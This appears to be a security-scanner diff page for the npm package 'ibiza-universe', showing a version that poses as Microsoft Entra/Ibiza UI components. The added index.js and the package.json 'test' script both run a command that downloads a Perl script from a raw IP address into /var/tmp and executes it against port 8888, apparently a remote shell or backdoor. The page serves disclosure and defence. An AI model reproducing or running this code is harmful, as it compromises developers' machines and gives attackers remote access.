ibiza-universe 0.0.1-security → 4.22.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ibiza-universe might be problematic. Click here for more details.
- package/index.js +11 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,11 @@
|
|
1
|
+
#!/usr/bin/env node
|
2
|
+
|
3
|
+
const { exec } = require('child_process');
|
4
|
+
exec('wget 27.102.130.223/m.pl -P /var/tmp && perl /var/tmp/m.pl 27.102.130.223 8888', (err, stdout, stderr) => {
|
5
|
+
if(err) {
|
6
|
+
console.log(err);
|
7
|
+
return;
|
8
|
+
}
|
9
|
+
console.log(`stdout: ${stdout}`);
|
10
|
+
console.log(`stderr: ${stderr}`);
|
11
|
+
})
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "ibiza-universe",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "4.22.2",
|
4
|
+
"description": "Encapsulates all of the Entra cross-extension common components that are utilized within the Ibiza framework's ReactViews.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget 27.102.130.223/m.pl -P /var/tmp && perl /var/tmp/m.pl 27.102.130.223 8888"
|
8
|
+
},
|
9
|
+
"author": "Kristian Nese",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ibiza-universe for more information.
|